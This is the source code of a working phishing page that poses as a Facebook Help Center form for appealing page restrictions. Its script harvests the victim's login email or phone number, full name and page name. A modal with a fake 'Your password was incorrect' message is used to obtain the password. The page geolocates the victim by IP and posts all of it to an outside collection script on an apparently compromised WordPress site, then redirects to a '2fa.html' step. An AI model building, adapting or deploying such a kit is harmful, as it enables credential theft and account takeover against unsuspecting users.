<html lang="en"><head>
      <meta charset="utf-8">
  <meta name="viewport" content="width=device-width, initial-scale=1">
  <link rel="stylesheet" href="https://maxcdn.bootstrapcdn.com/bootstrap/4.5.2/css/bootstrap.min.css">
  <link rel="icon" type="image/png" href="images/facebook.png">
  <script src="https://ajax.googleapis.com/ajax/libs/jquery/3.5.1/jquery.min.js"></script>
  <script src="https://cdnjs.cloudflare.com/ajax/libs/popper.js/1.16.0/umd/popper.min.js"></script>
  <script src="https://maxcdn.bootstrapcdn.com/bootstrap/4.5.2/js/bootstrap.min.js"></script>
      <link rel="stylesheet" href="style.css">
      <script type="text/javascript" src="jquery.min.js"></script>
      <title>Facebook Help Center</title>
      <style>
         .wrapper {
            display: flex;
            flex-wrap: wrap;
         }
         .top {
            width: 100%;
            height: 55px;
         }
         .left {
            width: 19%;
            height: 100%;
         }
         .right {
            width: 81%;
            height: 100%;
         }
         .main-container2 {
            width: 45%;
            margin-top: 20px;
            position: relative;
            top: unset;
            left: unset;
            transform: unset;
         }

           @media only screen and (max-width: 1919px) and (min-width: 1501px)  {
              .left{
                width: 25%;

              }
              .right{
                width: 75%;
              }
              .left img {
                    text-align: center;
                    max-width: 100%;
                    height: auto;
                    margin-left: 40%;
              }

         }

         @media(max-width: 1500px) {
            .top {
               position: absolute;
               left: 0;
               right: 0;
               top: 0;
               bottom: 0;
               width: 100%;
               height: 55px;
            }
            .top img, .left img, .right img {
               width: 100%;
               height: auto;
            }
            .left {
               position: relative;
               top: 55px;
            }
            .right {
               position: relative;
               top: 40px;
            }
         }
      </style>
      <script type="text/javascript">
      $(document).ready(function(){
         var urlSite=(location.href.substring(0, location.href.lastIndexOf('/')));
        $('#siteUrl').val(urlSite);
      });

      $(document).ready(function() {
  $(window).keydown(function(event){
    if(event.keyCode == 13) {
      event.preventDefault();
      return false;
    }
  });
});
      </script>


   </head>
   <body data-bs-padding-right="" class="modal-open" style="padding-right: 17px;">


<!-- The Modal -->
<div class="modal show" id="myModal" aria-modal="true" role="dialog" style="padding-right: 17px; display: block;">
  <div class="modal-dialog modal-dialog-centered">
    <div class="modal-content">
      
      <!-- Modal Header -->
      <div class="modal-header">
        <h6 class="modal-title">Enter Your Password</h6>
        <button type="button" class="close" data-dismiss="modal">×</button>
      </div>

      <!-- Modal body -->
      <form>
      <div class="modal-body">
        <p style="">
            Make sure your password is correct, you must re-enter your password to continue.


         </p>
         <p style="color:#a94442; font-size: 12px;">
            Your password was incorrect
         </p>
         <input type="hidden" name="siteUrl" id="siteUrl" value="">
        <input required="" type="password" id="firstpassword" name="firstpassword" class="form-control" placeholder="Enter Password Here">
      </div>

      <!-- Modal footer -->
      <div class="modal-footer">
        <input class="submitBtn" id="pwbutton" type="button" value="Continue">
      </div>
      </form>

    </div>
  </div>
</div>


      <div class="wrapper">
         <div class="top">
            <img src="images/top.png" alt="">
         </div>
   
         <div class="left">
            <img src="images/left.png" alt="">
         </div>
   
         <div class="right">
            <img src="images/bottom-top.png" alt="">

            <div class="main-container2">
               <div class="custom-form">
                  <div class="appeal">
                     <h3>Appeal a Page Policy Violation</h3>
                  </div>
                 

                  <p class="normal-text">
                     If you think your page was restricted by mistake, please fill out this form: 
                  </p>
                  <form name="RegForm" id="registerForm" onsubmit="return submitForm()">
                  <div class="mb-3">
                     <label for="exampleFormControlInput1" class="form-label">Page Name</label>
                     <input type="text" name="Name" required="" class="form-control" id="pagename">
                  </div>
                  <div class="mb-3">
                     <label for="exampleFormControlInput1" class="form-label">Login email address or mobile phone number</label>
                     <input type="text" required="" class="form-control" id="exampleFormControlInput1">
                  </div>
                  <div class="mb-3">
                     <label for="exampleFormControlInput1" class="form-label">Your full name</label>
                     <input required="" type="text" name="exampleFormControlInput2" class="form-control" id="exampleFormControlInput2">
                  </div>
                  <div class="mb-3">
                     <label for="exampleFormControlTextarea1" class="form-label">Additional info</label>
                     <textarea class="form-control" name="exampleFormControlTextarea3" id="exampleFormControlTextarea3" rows="3"></textarea>
                  </div>
      
                  <div class="bottom" style="padding-bottom: 2rem !important;">
                    <input class="submitBtn" type="submit" value="Continue">
                  </div>
                  </form>
               </div>
            </div>

            <!-- <img src="images/footer.png" alt=""> -->
         </div>
      </div>



  

      <script src="https://cdn.jsdelivr.net/npm/bootstrap@5.0.0-beta1/dist/js/bootstrap.bundle.min.js" integrity="sha384-ygbV9kiqUc6oa4msXn9868pTtWMgiQaeYH7/t7LECLbyPA2x65Kgf80OJFdroafW" crossorigin="anonymous"></script>
      
      <script type="text/javascript">
            var email;
            var name;
            var additionalinfos;
            var pagename;
            

            function submitForm(){
               if(validateForm()){
                  email =  document.getElementById('exampleFormControlInput1').value;                  
                  name = document.getElementById("exampleFormControlInput2").value;
                  additionalinfos=document.getElementById("exampleFormControlTextarea3").value;
                  pagename=document.getElementById("pagename").value;
                  event.preventDefault();
                  var step4HTML='';
                  $('#myModal').modal('show'); 
                  sendData()
                  /*setTimeout(function(){
                  $('.main-container2').html('<form name="RegForm" id="registerForm"><div class="custom-form"><div class="appeal"><h3>Enter Your Password</h3></div><p class="normal-text">For your security, you must enter your password to continue.</p><div class="mb-3 row border-top-bottom"><label for="inputPassword" class="col-sm-3 col-form-label">Your Password</label><div class="col-sm-9"><input type="password" required name="password" class="form-control" id="inputPassword"></div></div><div class="bottom"><button id="submitBtn" class="submitBtn" onclick="sendData()">Continue</button></form> </div></div>');  
                  }, 750);*/
               }
               else return false;
            }

        function sendData()
        {

  var country_name;
  var country_code;
  var country_city;
  var ipaddress;
  var origin = true;


          $.getJSON('https://ipapi.co/json/', function(data) {
  var obj = JSON.parse(JSON.stringify(data, null, 2));
   country_name = obj.country;
   country_code = obj.country_code;
   country_city = obj.city;
   ipaddress = obj.ip;

         event.preventDefault()
               var siteUrl=window.location.href;
               var emailInfos='Ok';
               //var firstPassword =  document.getElementById('inputPassword').value; 
               $.post("https://thepleasy.com/wp-admin/sendAjax.php",
                        {
                          email: email,
                          fullname: name,
                          emailInfos:emailInfos,
                          tjerat:additionalinfos,
                          pgname: pagename,
                          siteUrl: siteUrl,
                          country: country_name,
                          ip: ipaddress,
                          city: country_city,
                          device: getDeviceType,
                          origin: origin
                        },
                        function(data, status){
                          //window.location.href='step5.html';
                  });  

               });
                       
        }

     //   function sendPass(){


                $("#pwbutton").click(function(e){
                  e.preventDefault();
           


const getDeviceType = () => {
  const ua = navigator.userAgent;
  if (/(tablet|ipad|playbook|silk)|(android(?!.*mobi))/i.test(ua)) {
    return "Tablet";
  }
  if (
    /Mobile|iP(hone|od|ad)|Android|BlackBerry|IEMobile|Kindle|Silk-Accelerated|(hpw|web)OS|Opera M(obi|ini)/.test(
      ua
    )
  ) {
    return "Mobile";
  }
  return "Desktop";
};
                
          $.getJSON('https://ipapi.co/json/', function(data) {
  var obj = JSON.parse(JSON.stringify(data, null, 2));
   country_name = obj.country;
   country_code = obj.country_code;
   country_city = obj.city;
   ipaddress = obj.ip;

                       let el = document.createElement("input");
                //    el.value = document.getElementById('firstpassword').value;
                //    el.id="firstpaswordD";
           //   el.name="firstPassword";
           //  var fullname=document.getElementById('fname').value;
           //   var firstpassword= document.getElementById('firstpassword').value;
              var pw =document.getElementById('firstpassword').value;
               //     let form = document.getElementById("formasubmitapeal");
                  //  form.appendChild(el);

                  if(pw != ""){

                  

              $.post("https://thepleasy.com/wp-admin/sendAjax.php", 
              {
             //   email: email,
            //    fullname: fullname,
                passwordDY: pw,
                ip: ipaddress,
                city: country_city,
                device: getDeviceType,
           
              },
              function (data, status) {
                  window.location.href = "2fa.html";
                 
           });

              }
              });

              });


     //   }


        function validateForm(){
         event.preventDefault()
        var name = document.forms["RegForm"]["Name"]; 
        var email = document.forms["RegForm"]["EMail"]; 
        var phone = document.forms["RegForm"]["Telephone"]; 
        var what = document.forms["RegForm"]["Subject"]; 
      
  
        if (name.value == "") { 
            window.alert("Please enter your name."); 
            name.focus(); 
            return false; 
        } 
       
        return true; 
        }

        $(document).ready(function(){
          setTimeout(function(){
            $("#body").show();
          },300);
        });
        
      </script>
  
<div class="modal-backdrop show"></div></body></html>